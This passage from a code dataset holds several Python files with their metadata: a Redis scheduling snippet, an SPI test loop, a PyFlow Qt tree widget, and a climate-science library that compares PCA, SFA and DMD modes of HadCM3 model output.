enumerate(shedule[cur_date]):\n\tevent_time = time.strptime(event[\"time\"], \"%H:%M\")\n\tif event_time.tm_hour <= cur_time.tm_hour and event_time.tm_min <= cur_time.tm_min: \n\t\tif not flag: shedule[cur_date][i][\"type\"] = 1\n\t\telse: shedule[cur_date][i][\"type\"] = 2\n\t\tflag = True\n\telse: shedule[cur_date][i][\"type\"] = 0\n\nshedule = 
json.dumps(shedule)\nrds.set(key, shedule)\n\n", "sub_path": "scripts/shedule.py", "file_name": "shedule.py", "file_ext": "py", "file_size_in_byte": 761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "redis.from_url", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 21, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "586863378", "text": "import spidev\nimport time\n\nusleep = lambda x : time.sleep(x/1000000.0)\n\nspi = spidev.SpiDev()\nspi.open(0, 1)\nspi.max_speed_hz = 2000000\n\nwhile True:\n resp = spi.xfer2([0x00]) \n #print(resp[0])\n usleep(1.0)\n\nspi.close()\n", "sub_path": "spi_test.py", "file_name": "spi_test.py", "file_ext": "py", "file_size_in_byte": 231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "time.sleep", "line_number": 4, "usage_type": "call"}, {"api_name": "spidev.SpiDev", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "636734201", "text": "from Qt import QtWidgets, QtCore\nimport sys\nimport collections\n\nclass EditPropertiesTreeWidget(QtWidgets.QTreeWidget):\n def __init__(self):\n super(EditPropertiesTreeWidget, self).__init__()\n self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)\n self.setHeaderHidden(True)\n\n def addFolder(self, name, parent=None):\n icon = self.style().standardIcon(QtWidgets.QStyle.SP_DirIcon)\n item = QtWidgets.QTreeWidgetItem([name])\n item.setIcon(0, icon)\n item.isFolder = True\n if parent is None:\n self.addTopLevelItem(item)\n else:\n parent.addChild(item)\n return item\n\n def addNormal(self, name, parent=None):\n item = QtWidgets.QTreeWidgetItem([name])\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsDropEnabled)\n item.isFolder = False\n if parent is not None:\n parent.addChild(item)\n else:\n self.addTopLevelItem(item)\n return item\n\n def fill_dict_from_model(self, parent_index, d, model):\n v = collections.OrderedDict()\n for i in range(model.rowCount(parent_index)):\n ix = model.index(i, 0, parent_index)\n self.fill_dict_from_model(ix, v, model)\n if len(v) == 0:\n v = None\n d[parent_index.data()] = v\n\n def model_to_dict(self):\n model = self.model()\n d = collections.OrderedDict()\n for i in range(model.rowCount()):\n ix = model.index(i, 0)\n self.fill_dict_from_model(ix, d, model)\n return d\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n form = EditPropertiesTreeWidget()\n form.addNormal(\"Normal\")\n form.addNormal(\"Normal1\")\n form.addFolder(\"Folder\")\n form.addFolder(\"Folder1\")\n form.show()\n\n app.exec_()\n", "sub_path": "PyFlow/UI/Widgets/EditPropertiesWidget.py", "file_name": "EditPropertiesWidget.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Qt.QtWidgets.QTreeWidget", "line_number": 5, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 5, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QAbstractItemView", 
"line_number": 8, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 8, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QStyle", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 12, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QTreeWidgetItem", "line_number": 13, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 13, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QTreeWidgetItem", "line_number": 23, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 24, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 43, "usage_type": "call"}, {"api_name": "Qt.QtWidgets.QApplication", "line_number": 51, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 51, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "247680035", "text": "import numpy as np\nimport pandas as pd\nimport xarray as xr\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as mpl_cm\nimport cartopy.crs as ccrs\nimport seaborn as sns\nimport cmocean\n\nfrom scipy import signal\nfrom scipy.stats import pearsonr\n\nimport pyclimine as pcm\n\nfrom matplotlib import gridspec\n\n#############################\n# WRAPPED MODELS\n#############################\n \nclass wrapped_pca(object):\n def __init__(self, n_components, **kwargs):\n self._model_modes = n_components\n \n # model specific imports\n from sklearn.decomposition import PCA\n \n self.model = PCA(n_components = n_components, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n def train_model(self, X_train):\n self.model_series = self.model.fit_transform(X_train)\n \n def retrieve_model_modes(self):\n return self.model.components_\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return self.model_series[:N].T[..., np.newaxis] * self.model.components_[:, np.newaxis, :]\n \n def model_flatten_modes(self):\n return np.matmul(self.model_series, self.model.components_)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.model.components_.reshape((self.model_modes, \n latslen, \n lonslen))\n def decompose_data(self, X):\n series = self.model.transform(X)\n return series.T[..., np.newaxis] * self.model.components_[:, np.newaxis, :]\n \n def mode_info(self, n):\n return 'Mode {} | var : {:.3f}'.format(n, self.model.explained_variance_ratio_[n])\n \n\nclass wrapped_sfa(object):\n def __init__(self, n_components, pca_components=None, **kwargs):\n self._model_modes = n_components\n if pca_components is None: pca_components=2*n_components\n self._model_modes = n_components\n \n # model specific imports\n from mdp.nodes import SFANode, PCANode\n \n self.model = PCANode(output_dim=pca_components) + SFANode(output_dim=n_components, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n @staticmethod\n def one_hot_column(x, n):\n y = np.zeros(x.shape)\n y[:,n]=x[:,n]\n return y\n \n def train_model(self, X_train):\n self.model.train(X_train)\n self.model_series = self.model.execute(X_train)\n \n def retrieve_model_modes(self):\n \n def one_hot(n,N):\n x = np.zeros(N)\n x[n]=1\n return x\n \n return self.model.inverse(np.array([one_hot(n,self.model_modes) \n for n 
in range(self.model_modes)]))\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return np.array([self.model.inverse(self.one_hot_column(self.model_series[:N], n)) \n for n in range(self.model_modes)])\n \n def model_flatten_modes(self):\n return self.model.inverse(self.model_series)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.retrieve_model_modes().reshape((self.model_modes, \n latslen, \n lonslen))\n \n def decompose_data(self, X):\n series = self.model.execute(X)\n return np.array([self.model.inverse(self.one_hot_column(series, n)) \n for n in range(self.model_modes)])\n \n def mode_info(self, n):\n return 'Mode {} | delta eig : {:.3f}'.format(n, self.model[1].d[n])\n\n \n \nclass wrapped_dmd(object):\n def __init__(self, n_components, **kwargs):\n self._model_modes = n_components\n \n # model specific imports\n from pydmd import DMD\n\n self.model = DMD(svd_rank=n_components, opt=False, exact=False, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n def train_model(self, X_train):\n self.model.fit(X_train.T)\n # calculate latent variable time series\n self.model_series = np.zeros((X_train.shape[0], self.model_modes))\n for i in range(X_train.shape[0]):\n self.model_series[i] = self.model._compute_amplitudes(self.model.modes, \n X_train[i:i+1].T, \n self.model.eigs, \n False)\n \n def retrieve_model_modes(self):\n return self.model.modes.T.real\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return np.real(self.model.modes.T[:,np.newaxis,:] * \\\n self.model_series[:N].T[:,:,np.newaxis])\n \n def model_flatten_modes(self):\n return np.real(np.matmul(self.model.modes, self.model_series.T).T)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.retrieve_model_modes().reshape((self.model_modes, \n latslen, \n lonslen))\n def decompose_data(self,X):\n series = np.zeros((X.shape[0], self.model_modes))\n for i in range(X.shape[0]):\n series[i] = self.model._compute_amplitudes(self.model.modes, \n X[i:i+1].T, \n self.model.eigs, \n False)\n return np.real(self.model.modes.T[:,np.newaxis,:] * \\\n series.T[:,:,np.newaxis])\n \n def mode_info(self, n):\n return 'Mode {} | A eig : {:.3f}'.format(n, self.model.eigs[n])\n\n###################################################\n# MULTIMODEL COMPILER\n###################################################\n\n\ndef zeros_line(i,N,n):\n x = np.zeros((N,n), dtype=bool)\n x[:,i] = True\n return x\n\ndef not_match_not_nan(x,y):\n return (~np.isnan(x))&(~np.isnan(y))&(x!=y)\n\ndef sortnan(a, fill=-999):\n return fill if np.isnan(a) else a\n\ndef non_nan(x):\n return x[~np.isnan(x)]\n\ndef nd_argmax(X):\n return np.unravel_index(np.nanargmax(X), X.shape)\n\ndef normalise_fields(data):\n d = np.zeros(data.shape[:2])\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n d[i,j]=np.nansum(data[i,j]**2)\n d[d==0]=1\n data=data/(d[:,:,np.newaxis, np.newaxis]**0.5)\n return data\n\nclass multi_model_application:\n def __init__(self, X_train, lats, lons, wrapped_models):\n self.X_train = X_train\n self.lats = lats\n self.lons = lons\n self.models = wrapped_models\n self.models_n_modes = [m.model_modes for m in self.models]\n self.model_mode_tuples = [(model, mode) for model, n_modes \n in enumerate(self.models_n_modes) \n for mode in range(n_modes)]\n \n def retrieve_model_mode_index(self, model_n, mode_n):\n for i,t in enumerate(self.model_mode_tuples):\n if t==(model_n, mode_n):\n return i\n return None\n \n 
def train(self):\n if isinstance(self.X_train, list):\n for x, m in zip(self.X_train, self.models):\n m.train_model(x)\n else:\n for m in self.models:\n m.train_model(self.X_train)\n \n \n def _calculate_match_matrix(self, D):\n \n match_matrix = pcm.evaluate.all_to_all_comparison_metric(D, D)\n n1=0\n for n2 in self.models_n_modes:\n match_matrix[n1:n1+n2, n1:n1+n2] = np.nan\n n1+=n2\n match_matrix[np.tri(len(match_matrix), dtype=bool)]=np.nan\n return match_matrix\n \n def match(self, N=500, X_match=None):\n if isinstance(self.X_train, list):\n if X_match is None: X_match = self.X_train[0][:N]\n D = np.concatenate([m.decompose_data(X_match) for m in self.models])\n else:\n D = np.concatenate([m.model_project_modes(N=N) for m in self.models])\n self.match_matrix = self._calculate_match_matrix(D)\n self.groupings = self._assign_groupings(self.match_matrix)\n\n \n def corr_timeseries_to_index(self, index):\n model_series = np.concatenate([m.model_series for m in self.models], axis=1)\n mask = ~np.isnan(index)\n corr_sig = np.zeros((model_series.shape[1], 2))\n for i in range(model_series.shape[1]):\n corr_sig[i] = pearsonr(model_series[mask, i], index[mask])\n return corr_sig\n \n \n def plot_matched_modes(self, \n group_indices=[],\n col_titles=[], \n invert_match=True, \n figsize=None, \n sizetest=False,\n time_plot=None, # 'power_spectrum', #'power_spectrum' or 'time'\n time_colours=None,\n samp_freq=1, \n time_axis = ('frequency', 'months'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=12,\n labelsize=10,\n ticksize=8,\n correlation_index=None,\n nperseg=256,\n ):\n\n if group_indices == []:\n group_indices=list(np.arange(len(self.groupings)))\n\n # convenience variables\n max_modes = np.max(self.models_n_modes)\n latslen, lonslen = len(self.lats), len(self.lons)\n n_plot_rows=len(group_indices)\n add_time_plot = True if time_plot in ['power_spectrum', 'time'] else False\n n_plot_cols=len(self.models)+add_time_plot\n\n if correlation_index is not None:\n corr_sig = self.corr_timeseries_to_index(correlation_index)\n\n if not sizetest:\n # Collect mode snaps\n data = np.zeros((len(self.models), max_modes, latslen, lonslen))\n for i, m in enumerate(self.models):\n data[i, :self.models_n_modes[i]] = \\\n m.model_mode_snaps(latslen, lonslen)\n data = normalise_fields(data)\n\n # set up plot\n fig = plt.figure(figsize = figsize)\n gsn = gridspec.GridSpec(n_plot_rows, n_plot_cols, figure=fig)\n map_proj = ccrs.PlateCarree()\n\n selected_groupings = [g for i,g in enumerate(self.groupings) if i in group_indices]\n\n for n, group in enumerate(selected_groupings):\n\n if not sizetest:\n # colorbar max extent same across group row\n v_abs_max = np.nanmax([np.nanmax(abs(data[i,m])) \n for i,m in enumerate(group) \n if m is not None])\n\n # first non-None in group\n first_n, first_m = [(i,m) for i,m in enumerate(group) \n if m is not None][0]\n\n for model_n, mode in enumerate(group):\n invert_field=False\n #v_abs_max = np.percentile(abs(data[i,m]), 99)\n\n gs0 = gridspec.GridSpecFromSubplotSpec(1, 2,\n subplot_spec=gsn[n_plot_cols*n+model_n+add_time_plot], \n width_ratios=[20,1],)\n\n ax = plt.subplot(gs0[0], projection=map_proj)\n cax = plt.subplot(gs0[1])\n\n if mode is not None and not sizetest:\n\n # select mode field, negate if appropriate, plot\n z = data[model_n, mode]\n if invert_match:\n invert_field=np.nansum(z*data[first_n, first_m])<0\n if invert_field: \n z=-z\n\n xz = xr.DataArray(z, \n coords = [self.lats, self.lons], \n dims=['latitude', 'longitude'])\n\n im=xz.plot(ax = ax, 
transform=map_proj, \n cmap=cmocean.cm.balance, \n vmin=-v_abs_max, vmax=v_abs_max, \n add_colorbar=False)\n\n if mode is not None:\n ax.coastlines()\n\n if labels=='number':\n # Annotate with mode number\n\n ax.text(0.5,-0.17, 'mode {}'.format(mode),\n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n elif labels=='info':\n # Annotate with mode number\n\n ax.text(0.5,-0.17, self.models[model_n].mode_info(mode),\n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n if correlation_index is not None:\n corr, p_val = corr_sig[\n self.retrieve_model_mode_index(model_n, mode)\n ]\n ax.text(0.5,-0.3, 'corr {:.3f}, p-val {:.3f}'.format(\n -corr if invert_field else corr, p_val), \n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n if labels=='match':\n # Annotate with mode number\n mode_tuples = [(i, m) for i, m in enumerate(group) \n if (i,m)!=(model_n, mode)]\n\n if np.all([tup[1] is not None for tup in mode_tuples]):\n\n m1, m2 = [self.retrieve_model_mode_index(*tup) \n for tup in mode_tuples]\n\n metric=np.nanmax(\n [self.match_matrix[m1,m2], \n self.match_matrix[m2,m1]])\n ax.text(0.5,-0.17, '<- m = {:.3f} ->'.format(metric), \n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n\n if not sizetest:\n if model_n==(len(self.models)-1):\n cbar = plt.colorbar(im, cax=cax)\n cbar.ax.tick_params(labelsize=ticksize) \n\n else:\n cax.axis('off')\n\n if col_titles!=[]:\n if n==0:\n ax.set_title(col_titles[model_n], fontsize=titlesize)\n\n if time_plot is not None:\n\n # place to store lines for legend\n legend_lines_dict={}\n\n\n for i in range(n_plot_rows):\n # create axis\n gs0 = gridspec.GridSpecFromSubplotSpec(1, 2,\n subplot_spec=gsn[n_plot_cols*i], \n width_ratios=[20,1])\n ax = plt.subplot(gs0[0])\n\n # include power spectrum to the left of the mode fields\n if time_plot=='power_spectrum':\n\n # plot power spectrum\n self._add_spectrum_plot(self.groupings[i], \n ax, \n samp_freq, \n include_legend=False,\n labels=col_titles,\n time_axis = time_axis, \n plot_kind = plot_kind,\n fontsize=labelsize,\n colours=time_colours,\n nperseg=nperseg)\n\n self._modify_ticksize(ax, ticksize)\n\n # store line labels\n for line, label in zip(*ax.get_legend_handles_labels()):\n legend_lines_dict[label]=line\n\n\n elif time_plot=='time':\n # create axis\n if time_colours is None:\n prop_cycle = plt.rcParams['axes.prop_cycle']\n colours = prop_cycle.by_key()['color']\n else:\n colours=time_colours\n time_labels = col_titles\n if time_labels==[]:\n time_labels=np.arange(len(self.groupings[i]))\n\n y0=None\n for model_n, mode_n in enumerate(self.groupings[i]):\n if mode_n is not None:\n if y0 is None:\n y0 = self.models[model_n].model_series[:,mode_n]\n y0 = y0-y0.mean()\n\n y = self.models[model_n].model_series[:,mode_n]\n y = y-y.mean()\n y = y/y.std()\n if np.dot(y, y0)<0: y = -y\n ax.plot(y, color=colours[model_n], label=time_labels[model_n], zorder=-model_n, alpha=0.5)\n\n # store line labels\n for line, label in zip(*ax.get_legend_handles_labels()):\n legend_lines_dict[label]=line\n\n # add legend to last axis\n legend_labels = list(legend_lines_dict.keys())\n legend_lines = [legend_lines_dict[label] for label in legend_labels]\n ax.legend(legend_lines, legend_labels, \n loc = 'best', fontsize=labelsize)\n\n\n plt.tight_layout()\n return fig\n\n \n def _add_spectrum_plot(self, grouping, ax, samp_freq,\n time_axis = ('frequency', 'months'), \n plot_kind = 'loglog',\n include_legend=False,\n labels=[], \n fontsize=12,\n nperseg=256,\n colours=None\n ):\n \"\"\"\n args:\n 
samp_freq: the time spacing, in months\n \"\"\"\n if labels==[]:\n labels=np.arange(len(grouping))\n\n # plot types dict\n plots_dict = {'loglog':ax.loglog, \n 'semilogy':ax.semilogy,\n 'linear':ax.plot}\n # check inputs\n if plot_kind not in plots_dict.keys():\n raise ValueError(\n 'plot_kind : {} not valid. Must be one of {}'.format(\n plot_kind,plots_dict.keys())\n )\n\n if time_axis[0] not in ('frequency', 'period') or \\\n time_axis[1] not in ('months', 'years'):\n raise ValueError(\n 'time_axis : {} not valid. Must be one of {}'.format(\n time_axis, (('frequency', 'period'), ('months', 'years')))\n )\n\n def welch_time_axis_modifier(x1, fs, time_axis, nperseg):\n '''Function completes Welch power spectrum analysis and modifies\n output for the time axis wanted'''\n x1 = x1/np.std(x1)\n f, Pxx_spec = signal.welch(x1, fs, 'flattop', \n nperseg, scaling='spectrum')\n if time_axis[1]=='years':\n f = f*12\n if time_axis[0]=='period':\n f = f[1:]**-1\n Pxx_spec = Pxx_spec[1:]\n return f, Pxx_spec\n\n fs = samp_freq\n\n if colours is None:\n prop_cycle = plt.rcParams['axes.prop_cycle']\n colours = prop_cycle.by_key()['color']\n\n for n, N in enumerate(grouping):\n\n if N is not None:\n x1 = self.models[n].model_series[:,N]\n f, Pxx_spec = welch_time_axis_modifier(x1, fs, time_axis, nperseg)\n plots_dict[plot_kind](f, np.sqrt(Pxx_spec), color=colours[n], label=labels[n])\n\n plt.xlabel('{} ${}{}'.format(*time_axis,'^{-1}$' if time_axis[0] == 'frequency' else '$'), \n size=fontsize)\n plt.ylabel('Power spectrum', size=fontsize)\n\n if include_legend:\n ax.legend(framealpha=0, loc='best', fontsize=fontsize)\n\n \n def _modify_ticksize(self, ax, ticksize):\n ax.tick_params(axis=\"x\", labelsize=ticksize)\n ax.tick_params(axis=\"y\", labelsize=ticksize)\n \n\n def _assign_groupings(self, match_matrix, print_steps=False):\n match_matrix = match_matrix.copy()\n\n # matches by order\n xs, ys = np.meshgrid(np.arange(len(match_matrix)),\n np.arange(len(match_matrix)))\n ms = match_matrix.flatten()\n xs = xs.flatten()\n ys = ys.flatten()\n match_order = sorted(list(zip(ms, xs,ys)), key=lambda a: -sortnan(a[0]))\n\n # find all model number combinations\n Is, Js = np.meshgrid(np.arange(len(self.models)), np.arange(len(self.models)))\n mask = np.triu(np.ones((len(self.models), len(self.models)), dtype=bool), k=1)\n model_combos = list(zip(Is[mask], Js[mask]))\n\n\n # keep track of the matches already made\n used = [zeros_line(i,N,len(self.models)) \n for i, N in enumerate(self.models_n_modes)]\n\n # initiate empty set of matches\n sets = np.zeros((np.sum(self.models_n_modes), len(self.models_n_modes)))\n sets[:]=np.nan\n\n\n for match in match_order:\n outcome=None\n\n # if the match metric is nan skip\n # this indicates that the two indices are from the same model\n if np.isnan(match[0]):\n continue\n\n # model_mode_tup is (model_num, model_index)\n model_mode_tup1 = self.model_mode_tuples[match[1]]\n model_mode_tup2 = self.model_mode_tuples[match[2]]\n\n # if either (model, index) pair already has a match to the \n # other model then skip\n if used[model_mode_tup1[0]][model_mode_tup1[1], model_mode_tup2[0]]:\n continue\n\n if used[model_mode_tup2[0]][model_mode_tup2[1], model_mode_tup1[0]]:\n continue\n\n # if both models already have a match to another model and their match\n # indexes aren't the same, then skip, else combine the previous rows\n if (model_mode_tup1[1] in sets[:,model_mode_tup1[0]]) and \\\n (model_mode_tup2[1] in sets[:,model_mode_tup2[0]]):\n outcome='combine'\n # find the rows where both these things have another match\n row1 = 
sets[sets[:,model_mode_tup1[0]]==model_mode_tup1[1]][0]\n row2 = sets[sets[:,model_mode_tup2[0]]==model_mode_tup2[1]][0]\n\n # do these rows clash\n clash = np.any([not_match_not_nan(x,y) for x,y in zip(row1, row2)])\n\n # if they clash skip this\n if clash:\n continue\n\n # otherwise combine these rows\n new_row = [x if not np.isnan(x) else y for x,y in zip(row1, row2)]\n\n # and remove the old rows by...\n mask = sets[:,model_mode_tup2[0]]!=model_mode_tup2[1]\n # replacing one of them with the new row\n sets[sets[:,model_mode_tup1[0]]==model_mode_tup1[1]] = new_row\n # and removing the other one completely\n sets = sets[mask]\n\n # if one of the models has a match to another index then combine these\n elif (model_mode_tup1[1] in sets[:,model_mode_tup1[0]]) or \\\n (model_mode_tup2[1] in sets[:,model_mode_tup2[0]]):\n \n outcome='slot'\n in1 = model_mode_tup1[1] in sets[:,model_mode_tup1[0]]\n in2 = model_mode_tup2[1] in sets[:,model_mode_tup2[0]]\n\n # find the rows where both one model has index\n mask = (sets[:,model_mode_tup1[0]]==model_mode_tup1[1]) | \\\n (sets[:,model_mode_tup2[0]]==model_mode_tup2[1])\n\n new_row = sets[mask][0]\n\n if in1:\n new_row[model_mode_tup2[0]]=model_mode_tup2[1]\n elif in2:\n new_row[model_mode_tup1[0]]=model_mode_tup1[1]\n\n sets[mask]=new_row\n\n # if neither models are in the set already\n else:\n outcome='add'\n # first empty row of sets\n row_n = np.argmax(np.isnan(sets).sum(axis=1)==sets.shape[1])\n\n # make up the set\n new_row = np.array([np.nan]*len(self.models))\n new_row[model_mode_tup1[0]] = model_mode_tup1[1]\n new_row[model_mode_tup2[0]] = model_mode_tup2[1]\n\n # inset set into sets\n sets[row_n]=new_row\n\n\n # mark model-indexes as having a match to other model\n for i, j in model_combos:\n\n if not (np.isnan(new_row[i]) or np.isnan(new_row[j])):\n used[i][int(new_row[i]), j] = True\n used[j][int(new_row[j]), i] = True\n\n set_ = [np.nan]*len(self.models)\n set_[model_mode_tup1[0]] = model_mode_tup1[1]\n set_[model_mode_tup2[0]] = model_mode_tup2[1]\n\n if print_steps:\n print('\\n')\n print(sets[np.isnan(sets).sum(axis=1)!=sets.shape[1]], set_, outcome)\n\n\n # Add unmatched modes\n all_modes = [set(range(modes)) for modes in self.models_n_modes]\n matched_modes = [set(non_nan(sets[:,n])) for n in range(len(self.models))]\n unmatched_modes = [a_m - m_m for a_m, m_m in zip(all_modes, matched_modes)]\n\n for n, modes in enumerate(unmatched_modes):\n for mode in modes:\n # next empty row\n row_n = np.argmax(np.isnan(sets).sum(axis=1)==sets.shape[1])\n\n # build up set\n set_ = [np.nan]*len(self.models)\n set_[n]=mode\n sets[row_n]=set_\n\n # drop rows from set which are all nans \n sets = sets[np.isnan(sets).sum(axis=1)!=sets.shape[1]]\n\n # change to list form with Nones\n sets = [[int(n) if not np.isnan(n) else None for n in s] for s in sets]\n \n return sets\n \ndef closest_point_values(ds, lat, lon):\n lons_, lats_ = np.meshgrid(ds.longitude.values.astype(float),\n ds.latitude.values.astype(float))\n lons_ = lons_.reshape(np.product(lons_.shape))\n lats_ = lats_.reshape(np.product(lons_.shape))\n coords1 = np.vstack([lats_, lons_]).T\n coords2 = np.array([[lat, lon]])\n dists = pcm.generate.calculate_central_angle(coords1, coords2)\n closest = np.argmin(dists)\n clat, clon =lats_[closest], lons_[closest]\n data = ds.sel(latitude=clat, longitude=clon)\n return data\n \ndef calculate_point_index(da, coords=[(0,0)], coeffs=[1]):\n '''\n Args:\n coords: list of tuples of (lat, lon) for index\n coeffs: +1/-1 coefficient to use to calculate 
index\n '''\n \n da = pcm.process.signal_processing(da,\n agg_to_year = False,\n add_global_warming_signal = False,\n apply_standard_scaler=True,\n apply_area_weighting=False,\n normalise_by_year = False,\n normalise_by_rolling_year = False,\n normalise_by_month=True)\n \n series = [closest_point_values(da, lat, lon) for lat, lon in coords]\n \n index = series[0]*coeffs[0]\n \n for i in range(1,len(series)):\n index = index+series[i]*coeffs[i]\n return index\n\n\ndef calculate_nao_index(da):\n \"\"\"From details outlined here \n https://www.esrl.noaa.gov/psd/data/20thC_Rean/timeseries/monthly/NAO/\n \"\"\"\n # [Lisbon, Reykjavik]\n data = calculate_point_index(da, \n coords=[(37.71,-9.14), (64.13,-21.93)], \n coeffs=[1, -1])\n return data\n \n##############################################\n# BUTTER FILTER\n##############################################\n\nfrom scipy.signal import butter, lfilter, freqz\n\ndef butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter_2d(data, cutoff, fs, order=5):\n \"\"\"\n params:\n data (2D array): shape [time, measurements]\n cutoff (float): low pass cutoff frequency in Hertz\n fs (float): sampling frequency in Hertz\n \"\"\"\n b, a = butter_lowpass(cutoff, fs, order=order)\n filtered_data = np.empty_like(data)\n for i in range(data.shape[1]):\n filtered_data[:,i] = lfilter(b, a, data[:,i])\n return filtered_data\n\ndef filter_to_months(ds, months):\n month_mask = np.vectorize(lambda x : x in months)(\n ds.time.values.astype('datetime64[M]').astype(int) % 12 + 1\n )\n return ds.sel(time=month_mask)\n\n\nif __name__ == '__main__':\n \n # drift or all forcings run\n run='drift' # 'drift'/'all'\n months=[i for i in range(1,13)]# [11,12,1,2,3,4]\n plotname_addition=\"\" #default =\"\"\n save=False\n \n \n file_details = {'drift':\n {'filename':\"temp236_apm_Euroclim500_HadCM3_DRIFT_r1_080012_200011.nc\",\n \"pfilename\":\"p_apm_Euroclim500_HadCM3_DRIFT_r1_140012_200011.nc\",\n 'height_num':10,\n 'pheight_num':13,\n },\n 'all':\n {'filename':\"temp236_apm_Euroclim500_HadCM3_ALL_r1_140012_200011.nc\",\n \"pfilename\":\"p_apm_Euroclim500_HadCM3_ALL_r1_080012_140011.nc\",\n 'height_num':11,\n 'pheight_num':15,\n },\n }\n \n data_filename = \"/exports/csce/datastore/geos/users/s1205782/climate_data/HadCM3_initial/\" \\\n + file_details[run]['filename']\n \n pdata_filename = \"/exports/csce/datastore/geos/groups/TITAN/aschurer/EuroClim500/\" \\\n + file_details[run]['pfilename']\n \n ds_t = xr.open_dataset(data_filename)\n ds_p = xr.open_dataset(pdata_filename)\n ds = xr.merge([ds_t.temp236, ds_p.p])\n \n ds = ds.rename({\n \"time0\": \"time\",\n \"longitude0\": \"longitude\",\n \"latitude0\": \"latitude\",\n })\n \n z_name = 'z{}_height'.format(file_details[run]['height_num'])\n ds = ds.squeeze(z_name).drop(z_name)\n \n pz_name = 'z{}_msl'.format(file_details[run]['pheight_num'])\n ds = ds.squeeze(pz_name).drop(pz_name)\n \n ds['features'] = pcm.process.signal_processing(ds.temp236,\n agg_to_year = 0,\n add_global_warming_signal = 0,\n apply_standard_scaler=0,\n apply_area_weighting=1,\n normalise_by_year = 0,\n normalise_by_rolling_year = 0,\n normalise_by_month=1)\n ds['features'] = ds['features'] - ds['features'].mean(dim=['time'])\n \n # apply month filtering\n ds_x = filter_to_months(ds, months).isel(time=slice(-1000, None))\n\n n_lats = ds_x.latitude.shape[0]\n n_lons = ds_x.longitude.shape[0]\n lats=ds_x.latitude.values\n 
lons=ds_x.longitude.values\n\n x = ds_x.features.values.reshape(ds_x.time.shape+(np.product(ds_x.features.shape[1:]),))\n X_train = x[~np.any(np.isnan(x), axis=(1))].astype(np.float64)\n nao_index = calculate_nao_index(ds_x.p)\n \n # select models\n m1 = wrapped_sfa(10, 50)\n m2 = wrapped_dmd(10)\n m3 = wrapped_pca(10)\n wrapped_models= [m1, m2, m3]\n\n # instantiate comparison model wrapper\n MM = multi_model_application(X_train, lats, lons, wrapped_models)\n \n MM.train()\n MM.match(N=200)\n print(MM.groupings)\n \n MM.plot_matched_modes(invert_match=True, \n figsize=(34,50), \n group_indices=[],\n col_titles=['SFA', 'DMD', 'PCA'], \n sizetest=False, \n time_plot='power_spectrum',\n samp_freq=1, \n time_axis = ('period', 'years'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=30,\n labelsize=20,\n ticksize=16,\n #correlation_index=nao_index.values,\n )\n if save:\n savename = 'power_spectrum_fields_{}.png'.format(\n run if plotname_addition==\"\" else run + \"_\" + plotname_addition\n )\n plt.savefig(savename)\n\n \n\n plt.show()\n \n \n MM.plot_matched_modes(invert_match=True, \n figsize=(30,4.5), \n group_indices=[0],\n col_titles=['SFA', 'DMD', 'PCA'], \n sizetest=False, \n time_plot='power_spectrum',\n samp_freq=1, \n time_axis = ('period', 'years'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=40,\n labelsize=30,\n ticksize=25,\n #correlation_index=nao_index.values,\n )\n plt.tight_layout()\n plt.savefig('poster_hadcm3_gw.png', transparent=True, dpi=300, pad_inches=1)\n plt.show()", "sub_path": "notebooks/notebook_lib.py", 